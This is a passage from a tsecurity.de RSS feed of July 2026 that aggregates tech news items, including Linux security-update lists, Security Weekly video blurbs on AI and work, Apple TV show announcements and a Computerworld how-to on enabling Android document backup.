<link>https://tsecurity.de/de/3687819/linux-tipps/lwnnet-weekly-edition-for-july-23-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687819/linux-tipps/lwnnet-weekly-edition-for-july-23-2026/</guid>
<pubDate>Thu, 23 Jul 2026 02:36:14 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Inside this week's LWN.net Weekly Edition:
        <p>
        </p><ul>
<li> <a href="https://lwn.net/Articles/1083123/">Front</a>: LLMs in the kernel; GNOME save and restore; Fedora changes; BPF and tracepoints; BPF and LSMs; famfs; sched_ext.
            </li><li> <a href="https://lwn.net/Articles/1083125/">Briefs</a>: GNOME security; PyPI policy; Arch on aarch64; Firefox 153; Quotes; ...
            </li><li> <a href="https://lwn.net/Articles/1083126/">Announcements</a>: Newsletters, conferences, security updates, patches, and more.
            </li></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zwei Probleme in perl-Crypt-OpenSSL-X509 (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3687621/it-security-nachrichten/zwei-probleme-in-perl-crypt-openssl-x509-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687621/it-security-nachrichten/zwei-probleme-in-perl-crypt-openssl-x509-fedora/</guid>
<pubDate>Wed, 22 Jul 2026 23:09:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Zwei Probleme in perl-Crypt-OpenSSL-X509 (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3687619/it-security-nachrichten/zwei-probleme-in-perl-crypt-openssl-x509-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687619/it-security-nachrichten/zwei-probleme-in-perl-crypt-openssl-x509-fedora/</guid>
<pubDate>Wed, 22 Jul 2026 23:09:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Are Schools Falling Behind AI?]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 Rapid advances in AI are forcing organizations to rethink how people learn new skills. The question isn't only how employees adapt, but whether K–12 education, universities, and professional development can keep pace.

Waiting unt...]]></description>
<link>https://tsecurity.de/de/3687589/it-security-video/are-schools-falling-behind-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687589/it-security-video/are-schools-falling-behind-ai/</guid>
<pubDate>Wed, 22 Jul 2026 23:03:42 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/uv3jdRuvn2I?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Rapid advances in AI are forcing organizations to rethink how people learn new skills. The question isn't only how employees adapt, but whether K–12 education, universities, and professional development can keep pace.<br />
<br />
Waiting until workforce shortages appear could mean reacting too late. Updating curricula before major disruptions occur may help prepare students and workers for jobs that increasingly involve AI and automation.<br />
<br />
If you could change one thing about today's education system to prepare people for an AI-driven workforce, what would it be?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#Education #FutureOfWork #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ted Lasso Season 4 Early Buzz Says New Episodes Bring Back Season 1 Magic]]></title>
<description><![CDATA[Ted Lasso season 4 is almost here, and early reports suggest fans have good reason to feel excited about the show's return. The new season premieres on August 5 with its first episode, followed by weekly releases through October 7, and people close to the production believe it delivers a stronger...]]></description>
<link>https://tsecurity.de/de/3687335/ios-mac-os/ted-lasso-season-4-early-buzz-says-new-episodes-bring-back-season-1-magic/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687335/ios-mac-os/ted-lasso-season-4-early-buzz-says-new-episodes-bring-back-season-1-magic/</guid>
<pubDate>Wed, 22 Jul 2026 20:40:27 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ted Lasso season 4 is almost here, and early reports suggest fans have good reason to feel excited about the show's return. The new season premieres on August 5 with its first episode, followed by weekly releases through October 7, and people close to the production believe it delivers a stronger story than season 3 while bringing back the charm that made the series a global hit.



The Hollywood Reporter recently shared an in-depth look at how season 4 came together, revealing that Jason Sudeikis originally planned to end the series after three seasons before changing his mind. Instead of moving ahead with one of several spinoff ideas, including projects centered on Roy Kent and Keeley Jones, the creative team decided to continue the main story with a fresh direction.



Season 4 shifts its focus to AFC Richmond's women's team, which was teased during the season 3 finale. Jason Sudeikis returns as Ted Lasso, while Hannah Waddingham, Juno Temple, Brett Goldstein, and several familiar faces also reprise their roles. The team also welcomed sitcom veteran Jack Burditt, who joined as co-showrunner to help keep production on schedule while Sudeikis continued leading the creative side.



Although critics have not published reviews yet, people involved with the series have shared positive reactions behind the scenes. Brett Goldstein said the new season has some of the season 1 magic, and several others reportedly share the same opinion. Internal feedback also describes season 4 as considerably stronger than season 3, which received mixed reactions because of its longer episodes and production challenges.



Jason Sudeikis said he finally returned because he still had more stories to tell, and he believes Ted Lasso remains meaningful for both him and the audience. If season 4 performs well, the writers expect to begin planning a fifth season, with Sudeikis already thinking about another three-season story arc.]]></content:encoded>
</item>
<item>
<title><![CDATA[You Can't Ban Attacker AI]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:2 AI capabilities are becoming widely accessible. The discussion is shifting from whether attackers will use AI to how defenders can use similar technology to identify weaknesses in their own environments.

If organizations focus on...]]></description>
<link>https://tsecurity.de/de/3687136/it-security-video/you-cant-ban-attacker-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687136/it-security-video/you-cant-ban-attacker-ai/</guid>
<pubDate>Wed, 22 Jul 2026 19:19:36 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:2 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/kIG1gWny_PE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>AI capabilities are becoming widely accessible. The discussion is shifting from whether attackers will use AI to how defenders can use similar technology to identify weaknesses in their own environments.<br />
<br />
If organizations focus only on restricting AI instead of adopting effective defensive tools, they may fall behind adversaries who are willing to use every available capability. Preparing for AI-assisted attacks means improving detection and resilience, not assuming access can be prevented.<br />
<br />
Should cybersecurity teams prioritize AI-powered defense over efforts to restrict access to AI models?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#CISO #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV Unveils Women in Blue Season 2 Trailer, Confirms August Release]]></title>
<description><![CDATA[Apple TV has released the official trailer for Women in Blue season 2, giving viewers a closer look at the dangerous new investigation facing María and the Azules. The Spanish-language crime drama returns globally on August 12, 2026, with a darker case connected to political violence, corruption ...]]></description>
<link>https://tsecurity.de/de/3686949/ios-mac-os/apple-tv-unveils-women-in-blue-season-2-trailer-confirms-august-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686949/ios-mac-os/apple-tv-unveils-women-in-blue-season-2-trailer-confirms-august-release/</guid>
<pubDate>Wed, 22 Jul 2026 18:01:36 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV has released the official trailer for Women in Blue season 2, giving viewers a closer look at the dangerous new investigation facing María and the Azules. The Spanish-language crime drama returns globally on August 12, 2026, with a darker case connected to political violence, corruption and buried secrets.



The new trailer shows María adjusting to her promotion while Valentina, Gabina and Ángeles continue fighting for their place inside a police department that often works against them. Together, they must investigate a series of deaths linked to one of the darkest chapters in Mexico’s history.




https://www.youtube.com/watch?v=Z9n3TkdcGLY




Women in Blue Season 2 Release Details




Episodes: 8 episodes



Genre: Crime drama and historical thriller



Language: Spanish



Season 2 premiere date: August 12, 2026



Release schedule: One new episode every Wednesday



Season finale date: September 30, 2026



Streaming platform: Apple TV




The eight-episode count follows from the confirmed weekly release schedule running from August 12 through September 30.



What Is Women in Blue Season 2 About?



Season 2 follows María, played by Bárbara Mori, after she receives a promotion to lieutenant. Her new position gives her greater responsibility, but it also places her between the department’s rules and her determination to uncover the truth.



The central investigation begins when police discover the body of a student activist. Evidence connects the death to the 1968 student massacre, pulling the Azules into a case involving powerful people and long-hidden crimes. Another body connected to the same period soon appears, suggesting that someone has started delivering their own form of justice directly to the police.



As the investigation grows, María, Valentina, Gabina and Ángeles face pressure inside and outside the precinct. The women must work through corruption, personal conflicts and institutional resistance while trying to identify the killer before another person dies.



The returning lead cast includes Bárbara Mori, Ximena Sariñana, Natalia Téllez and Amorita Rasgado. Miguel Rodarte, Leonardo Sbaraglia, Christian Tappan, Horacio García Rojas and Bruno Bichir also appear in the second season.



FAQs



When does Women in Blue season 2 premiere? Women in Blue season 2 premieres globally on Apple TV on Wednesday, August 12, 2026. The service will release one episode each week through September 30.  How many episodes are in Women in Blue season 2? The second season has eight weekly episodes based on its confirmed premiere and finale schedule.  Is there a Women in Blue season 2 trailer? Yes. Apple TV released the official season 2 trailer on July 21, 2026. It previews the new murder investigation, María’s promotion and the historical mystery involving the 1968 student massacre.  Who stars in Women in Blue season 2? Bárbara Mori returns as María, alongside Natalia Téllez as Valentina, Amorita Rasgado as Gabina and Ximena Sariñana as Ángeles. The wider cast includes Miguel Rodarte, Leonardo Sbaraglia, Christian Tappan, Horacio García Rojas and Bruno Bichir.  Do I need to watch season 1 first? Watching the first season will help viewers understand the relationships between the four women, their personal struggles and their difficult position within the police department. Season 2 introduces a new investigation but continues the main characters’ stories.  Where can I watch Women in Blue? Both seasons of Women in Blue, also known as Las Azules, are available exclusively on Apple TV.  



Apple TV costs $12.99 per month in the United States after a seven-day free trial for eligible new subscribers. Women in Blue season 2 begins streaming on August 12. Do you plan to follow the new investigation each week? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (389-ds-base, c-ares, dovecot, freerdp, glib2, gstreamer1-plugins-good, gstreamer1-plugins-ugly-free, hplip, kernel, kernel-rt, nodejs:22, perl-XML-LibXML, webkit2gtk3, and yggdrasil), Debian (kernel, nss, roundcube, rtpengine, and xz-utils), Fedora ...]]></description>
<link>https://tsecurity.de/de/3686772/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686772/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 22 Jul 2026 17:09:17 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (389-ds-base, c-ares, dovecot, freerdp, glib2, gstreamer1-plugins-good, gstreamer1-plugins-ugly-free, hplip, kernel, kernel-rt, nodejs:22, perl-XML-LibXML, webkit2gtk3, and yggdrasil), <b>Debian</b> (kernel, nss, roundcube, rtpengine, and xz-utils), <b>Fedora</b> (btrbk, kernel, mupdf, nuclei, perl-Crypt-OpenSSL-X509, rust-fern, rust-ifcfg-devname, rust-routinator, rust-rpki, and rust-syslog), <b>Mageia</b> (tig), <b>Oracle</b> (.NET 10.0, .NET 8.0, .NET 9.0, acl, dovecot, glib2, httpd, libtiff, pacemaker, perl-IO-Compress, plexus-utils, python3, and webkit2gtk3), <b>Slackware</b> (libssh and mozilla-firefox), <b>SUSE</b> (acl, avahi, aws-nitro-enclaves-cli, beets, chromium, firefox, go1.25-openssl, ImageMagick, iscsiuio, kernel, kubevirt1.8-container-disk, libgit2-1_9, libkrun, libsoup-3_0-0, nghttp2, opam, php7, python-aiohttp, python-tornado6, and vim), and <b>Ubuntu</b> (accountsservice, CUPS, imagemagick, jbig2dec, openssh, and snapd).]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Added a Third Employee]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:4 AI isn't just another software tool. It's increasingly being treated like a worker that operates around the clock, helping companies automate tasks and improve productivity.

That changes the incentives for employers. If AI can re...]]></description>
<link>https://tsecurity.de/de/3686646/it-security-video/ai-added-a-third-employee/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686646/it-security-video/ai-added-a-third-employee/</guid>
<pubDate>Wed, 22 Jul 2026 16:24:38 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/-2HEPOmFVPQ?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>AI isn't just another software tool. It's increasingly being treated like a worker that operates around the clock, helping companies automate tasks and improve productivity.<br />
<br />
That changes the incentives for employers. If AI can reliably handle part of the workload, businesses may rethink hiring, staffing, and investment decisions. The discussion isn't just about technology—it's about how organizations balance efficiency with the role of human workers.<br />
<br />
As AI becomes more capable, where should organizations draw the line between automation and maintaining a human workforce?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#FutureOfWork #Automation #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Pokémon Go encouraged me to find wonder in the world]]></title>
<description><![CDATA[These days, I ‘collect’ birdsong and wild flowers, but it all started when my sons and I first set out to find Pikachu and pals• Don’t get Pushing Buttons delivered to your inbox? Sign up hereBelieve it or not, Pokémon Go is 10 years old this month. The wildly successful smartphone game, which al...]]></description>
<link>https://tsecurity.de/de/3686641/it-nachrichten/how-pokmon-go-encouraged-me-to-find-wonder-in-the-world/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686641/it-nachrichten/how-pokmon-go-encouraged-me-to-find-wonder-in-the-world/</guid>
<pubDate>Wed, 22 Jul 2026 16:22:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>These days, I ‘collect’ birdsong and wild flowers, but it all started when my sons and I first set out to find Pikachu and pals</p><p><strong>• </strong><a href="https://www.theguardian.com/info/ng-interactive/2021/nov/24/sign-up-for-pushing-buttons-keza-macdonalds-weekly-look-at-the-world-of-gaming"><strong>Don’t get Pushing Buttons delivered to your inbox? Sign up here</strong></a></p><p>Believe it or not, Pokémon Go is <a href="https://www.theguardian.com/games/video/2026/jul/10/pokemon-go-fans-times-square-celebrate-10-years-game-video">10 years old this month</a>. The wildly successful smartphone game, which allows you to track down lovable creatures in the real world using GPS and augmented-reality technologies, has reportedly been downloaded 800m times across 150 countries and regions. A trillion Pokémon have been caught so far – and I have been responsible for a modest percentage of that figure.</p><p>When the game was first released, my sons and I spent many happy hours wandering the streets and parks of Frome searching for Jigglypuffs and Charizards, and the game’s social element, which lets you take on gym battles with other players in your vicinity, offered my autistic son a route to communicate with other children in a way he’d never been able to before.</p> <a href="https://www.theguardian.com/games/2026/jul/21/ten-years-after-its-release-pokemon-go-still-encourages-me-to-find-wonder-in-the-world-around-me">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[This $80 financial literacy bundle gives you lifetime access to 150+ money lessons]]></title>
<description><![CDATA[The Prosper financial literacy course gives you lifetime access to courses, AI-powered coaching and weekly sessions with a veteran investor.
(via Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.)]]></description>
<link>https://tsecurity.de/de/3686457/ios-mac-os/this-80-financial-literacy-bundle-gives-you-lifetime-access-to-150-money-lessons/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686457/ios-mac-os/this-80-financial-literacy-bundle-gives-you-lifetime-access-to-150-money-lessons/</guid>
<pubDate>Wed, 22 Jul 2026 15:16:04 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img width="780" height="439" src="https://www.cultofmac.com/wp-content/uploads/2026/07/Prosper-financial-literacy-course-1440x810.jpg.webp" class="attachment-large size-large wp-post-image" alt="Illustration of a woman in a business clothing using a computer to access Prosper financial literacy course." decoding="async" fetchpriority="high" srcset="https://www.cultofmac.com/wp-content/uploads/2026/07/Prosper-financial-literacy-course-1440x810.jpg.webp 1440w, https://www.cultofmac.com/wp-content/uploads/2026/07/Prosper-financial-literacy-course-400x225.jpg 400w, https://www.cultofmac.com/wp-content/uploads/2026/07/Prosper-financial-literacy-course-768x432@2x.jpg.webp 1536w, https://www.cultofmac.com/wp-content/uploads/2026/07/Prosper-financial-literacy-course-350x197.jpg 350w, https://www.cultofmac.com/wp-content/uploads/2026/07/Prosper-financial-literacy-course-768x432.jpg.webp 768w, https://www.cultofmac.com/wp-content/uploads/2026/07/Prosper-financial-literacy-course-1020x574.jpg.webp 1020w, https://www.cultofmac.com/wp-content/uploads/2026/07/Prosper-financial-literacy-course.jpg.webp 1600w, https://www.cultofmac.com/wp-content/uploads/2026/07/Prosper-financial-literacy-course-400x225@2x.jpg 800w" sizes="(max-width: 780px) 100vw, 780px"></div>
<p>The Prosper financial literacy course gives you lifetime access to courses, AI-powered coaching and weekly sessions with a veteran investor.</p>
<p>(via <a href="https://www.cultofmac.com/">Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.</a>)</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop debating frontier AI – start defending against it]]></title>
<description><![CDATA[The Computer Weekly Security Think Tank considers if Anthropic’s Claude Mythos frontier AI model is a benefit or barrier to achieving resilient enterprise IT security, and how security leaders need to adapt.]]></description>
<link>https://tsecurity.de/de/3686303/it-nachrichten/stop-debating-frontier-ai-start-defending-against-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686303/it-nachrichten/stop-debating-frontier-ai-start-defending-against-it/</guid>
<pubDate>Wed, 22 Jul 2026 14:36:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Computer Weekly Security Think Tank considers if Anthropic’s Claude Mythos frontier AI model is a benefit or barrier to achieving resilient enterprise IT security, and how security leaders need to adapt.]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS Weekly Roundup: One-click Lambda setup prompt, OpenAI GPT-5.6 models on Bedrock, and more (July 20, 2026)]]></title>
<description><![CDATA[Last week, my team visited Seoul to meet AWS Korea User Group (AWSKRUG) leaders. AWSKRUG is the largest cloud developer community in Korea, with 20 meetup groups organized by topic and area that collectively host over 100 events each year, primarily in Seoul. My team regularly visits countries ac...]]></description>
<link>https://tsecurity.de/de/3685885/ai-nachrichten/aws-weekly-roundup-one-click-lambda-setup-prompt-openai-gpt-56-models-on-bedrock-and-more-july-20-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685885/ai-nachrichten/aws-weekly-roundup-one-click-lambda-setup-prompt-openai-gpt-56-models-on-bedrock-and-more-july-20-2026/</guid>
<pubDate>Wed, 22 Jul 2026 12:07:31 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Last week, my team visited Seoul to meet AWS Korea User Group (AWSKRUG) leaders. AWSKRUG is the largest cloud developer community in Korea, with 20 meetup groups organized by topic and area that collectively host over 100 events each year, primarily in Seoul. My team regularly visits countries across the Asia-Pacific region, listens to feedback […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Your instant Android backup upgrade]]></title>
<description><![CDATA[Here in this high-tech era of 2026, keeping important info backed up and synced should be effortless and something that just happens on its own, automatically, without any actual thought or ongoing human effort.



In many areas of our digital life, that mercifully does Just Work™ in exactly that...]]></description>
<link>https://tsecurity.de/de/3685867/it-nachrichten/your-instant-android-backup-upgrade/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685867/it-nachrichten/your-instant-android-backup-upgrade/</guid>
<pubDate>Wed, 22 Jul 2026 12:02:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Here in this high-tech era of 2026, keeping important info backed up and synced <em>should </em>be effortless and something that just happens on its own, automatically, without any actual thought or ongoing human effort.</p>



<p class="wp-block-paragraph">In many areas of our digital life, that mercifully does Just Work™ in exactly that way. Fire up an email in most modern mail services, and you can stop at any point and find your in-progress draft in that same app on any other device. The same applies to any file you’re finessing within Google Drive or other cloud storage services or document you’re dawdling over in Docs.</p>



<p class="wp-block-paragraph">One area where seamless syncing somehow still <em>doesn’t</em> occur, though, is in the domain of <em>downloaded </em>documents on Android. If someone sends you a PDF or a Word file and you save it to your phone, that file exists in an archaic-seeming silo — only locally, on <em>that</em> one gadget. And that, of course, means (a) you can’t access it from any other device, and (b) if you misplace your phone or move into a new one at some point along the way, the file will be left behind in time and entirely unavailable.</p>



<p class="wp-block-paragraph">Well, take a moment to join me in celebration: Amidst all the <a href="https://www.computerworld.com/article/4136922/google-gemini-3-years.html">Gemini gobbledegook</a> that <a href="https://www.computerworld.com/article/2117752/google-gemini-ai.html">no one asked for</a> (and that often falls somewhere between <a href="https://www.computerworld.com/article/4182583/ai-creepy-era.html">“pointless”</a> and <a href="https://www.computerworld.com/article/3990497/google-gemini-deceit.html">“actively counterproductive”</a>), Google’s giving us a major upgrade to Android’s backup capabilities right now. It’s a simple-seeming switch buried in your system settings, and it’s up to <em>you</em> to find and activate it.</p>



<p class="wp-block-paragraph">Once you do, though, those once-orphaned documents on your Android device’s local storage will be perpetually synced and protected, automatically, without any ongoing thought or effort.</p>



<p class="wp-block-paragraph">All <em>you’ve </em>gotta do is find and flip that one new switch.</p>



<p class="wp-block-paragraph"><strong>[Don’t let yourself miss an ounce of Android Intelligence. </strong><a href="https://www.theintelligence.com/android-cw/" target="_blank" rel="noreferrer noopener"><strong>Join my free weekly Android Intelligence newsletter</strong></a><strong> and get one new thing to try in your inbox every Friday!]</strong></p>



<h2 class="wp-block-heading"><strong>The Android backup lowdown</strong></h2>



<p class="wp-block-paragraph">So, for a quick bit of pertinent context on this: Android’s backup systems have actually come a really long way over the years.</p>



<p class="wp-block-paragraph">‘Twas a time, y’see, when little to nothing about you would sync and carry over automatically from one Android device to another. Years ago — back in the ancient-seeming prehistoric era of the early 2010s — Android enthusiasts in the know would rely on community-created third-party apps for everything from remembering and resyncing downloaded apps to restoring data from within those apps and onward. And reconfiguring your system preferences would be a whole time-consuming song and dance every single time you reset a device or moved into a new one, as little to nothing would automatically carry over.</p>



<p class="wp-block-paragraph">Most of that stuff is now effortless and automatic. And, thanks to apps like Google Messages, Calendar, Drive, and Docs, many <em>other </em>areas of important data are also synced on their own at the app level — outside of any system mechanisms.</p>



<p class="wp-block-paragraph">Locally stored files, however, have remained an awkward omission. To this day, anything you download on any Android device exists only on <em>that</em> <em>one device </em>and isn’t synced or backed up anywhere. The only way that happens is — in a blast-from-the-past twist — if <em>you </em>go out of your way to <a href="https://www.computerworld.com/article/1711741/how-to-back-up-android-phones-complete-guide.html#:~:text=a%20new%20one.-,Files,-The%20easiest%20way">find and set up a third-party app to handle the heavy lifting</a>.</p>



<p class="wp-block-paragraph">That brings us to today. Right now, as we speak, Google’s in the midst of sending out a quiet under-the-hood update that (brace yourself…) adds in the option to automatically sync and back up any documents on your device as a native part of Android’s backup setup.</p>



<p class="wp-block-paragraph">See?</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/android-backup-documents.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Android backup documents" class="wp-image-4198961" width="1024" height="546" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">The easily overlooked new option for backing up documents on Android.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p class="wp-block-paragraph">The option is on its way to all devices running 2018’s <a href="https://www.computerworld.com/article/1698598/android-9-pie.html">Android 9 release</a> and higher. (If you’re still using a phone with an <a href="https://www.computerworld.com/article/1714347/android-versions-a-living-history-from-1-0-to-today.html">Android version</a> older than that, you’re now a whopping <em>eight years </em>out of date, and you have <a href="https://www.computerworld.com/article/1718016/android-upgrades-matter.html"><em>much</em> bigger problems</a>.)</p>



<p class="wp-block-paragraph">Once the added option is present and available for you, you’re literally lookin’ at 10 seconds to find and activate it.</p>



<p class="wp-block-paragraph">Lemme show ya how.</p>



<h2 class="wp-block-heading"><strong>Android’s document backup addition</strong></h2>



<p class="wp-block-paragraph">I promise: This couldn’t be much simpler.</p>



<p class="wp-block-paragraph">No matter what kind of Android device is in front of you, just head into your system settings and open the section called “Accounts and backup,” “Back up or copy data,” or something along those same lines. (The exact wording can vary based on who made your device and when it was released or last updated.)</p>



<p class="wp-block-paragraph">Either tap the line labeled “Google Backup” or look for an option to “Back up data” via Google Drive. You should then either see a series of options for different areas of available backup right then and there — or, depending on your device, you might have to tap a line labeled “Other device data” (or something similar) to find the full list of possibilities.</p>



<p class="wp-block-paragraph">However you get there, once you’re lookin’ at that list, you’ll see a newly added line for “Documents” if this latest under-the-hood update has reached you.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/android-backup-options.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Android backup options" class="wp-image-4198962" width="1024" height="742" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Android’s expanded list of backup options — now including documents alongside other forms of on-device data.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p class="wp-block-paragraph">And from there, all that’s left is to tap it and enable the switch to include that in your automated backups from that moment forward.</p>



<p class="wp-block-paragraph">If you aren’t seeing the option yet, don’t panic. Google always sends these under-the-hood updates out bit by bit over time, so the change probably just hasn’t reached your device quite yet. As long as you’re running Android 9 or higher, it’ll get there. Set yourself a reminder to check back once a week or so. Odds are, you’ll see it pretty soon.</p>



<p class="wp-block-paragraph">Notably, all documents synced in this way are always encrypted for security, and they’re kept in your personal (or, depending on the nature of your account, perhaps company-connected) Google Drive storage. That <em>does</em> mean they’ll count against your overall Google storage total, so keep an eye on your <a href="https://drive.google.com/drive/u/0/quota" target="_blank" rel="noreferrer noopener">Drive storage total</a> to make sure you’re in solid shape and look to the <a href="https://one.google.com/storage/management?from=1&amp;g1_landing_page=1" target="_blank" rel="noreferrer noopener">Google One storage hub</a> if you ever want some simple suggestions for freeing up space.</p>



<p class="wp-block-paragraph">Speaking of other Google services: If you ever want to keep <em>other</em> types of locally stored <em>non</em>-document files from an Android device synced and available elsewhere, you can easily rely on <a href="https://www.computerworld.com/article/1711741/how-to-back-up-android-phones-complete-guide.html#:~:text=in-app%20upgrade.-,Photos%20and%20music,-OK%2C%20so%20they">Google Photos for syncing screenshots and other images</a> — after enabling sync in general, be sure to look in the app’s “Collections” areas to find the “On this device” folder and then flip the toggle to “Backup all device folders” (or get more nuanced and open specific <em>individual </em>on-device folders if you want to sync some but not all of those areas) — and you can still turn to <a href="https://www.computerworld.com/article/1711741/how-to-back-up-android-phones-complete-guide.html#:~:text=a%20new%20one.-,Files,-The%20easiest%20way">those aforementioned third-party apps</a> for broader syncing of anything else imaginable.</p>



<p class="wp-block-paragraph">But with documents now being handled automatically and natively, that’s one big worry now out of your hair. Just note that the onus will fall on <em>you </em>to find and flip the switch and actively opt in to the feature on each and every Android device you’re using.</p>



<p class="wp-block-paragraph">Take 10 seconds to do that, though, and you’ll have one less void in your Android data arena. And you don’t need Gemini to tell you that <em>that </em>can only be a good thing.</p>



<p class="wp-block-paragraph"><em>Get practical Android knowledge in your inbox every Friday with </em><a href="https://www.theintelligence.com/android-cw/" target="_blank" rel="noreferrer noopener"><strong><em>my free Android Intelligence newsletter</em></strong></a><strong><em> </em></strong><em>— one new thing to try each week, straight from me to you.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI's Disruption as Cybersecurity's Economics Are Broken, Compounding Security Debt - Ben Gilliland - BSW #457]]></title>
<description><![CDATA[America has lived through technological and economic upheaval before. Farm workers moved to factories. Factory workers moved into services. New industries replaced old ones. Productivity rose. Living standards improved. But are we ready for the greatest disruption in American history? Ben Gillila...]]></description>
<link>https://tsecurity.de/de/3685794/it-security-nachrichten/ais-disruption-as-cybersecuritys-economics-are-broken-compounding-security-debt-ben-gilliland-bsw-457/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685794/it-security-nachrichten/ais-disruption-as-cybersecuritys-economics-are-broken-compounding-security-debt-ben-gilliland-bsw-457/</guid>
<pubDate>Wed, 22 Jul 2026 11:31:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
